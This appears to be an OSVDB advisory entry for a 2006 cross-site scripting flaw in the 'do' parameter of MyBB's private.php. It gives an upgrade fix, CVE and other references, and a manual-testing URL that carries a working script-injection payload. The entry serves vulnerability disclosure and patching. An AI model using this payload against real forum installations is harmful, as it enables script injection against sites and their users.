MyBulletinBoard (MyBB) private.php do Variable XSS

2006-06-06T05:04:09
ID OSVDB:26215
Type osvdb
Reporter OSVDB
Modified 2006-06-06T05:04:09

Description

Solution Description

Upgrade to version 1.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E&preview=Preview

References:

Vendor URL: http://www.mybboard.com/ Secunia Advisory ID:20492 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0042.html FrSIRT Advisory: ADV-2006-2190 CVE-2006-2949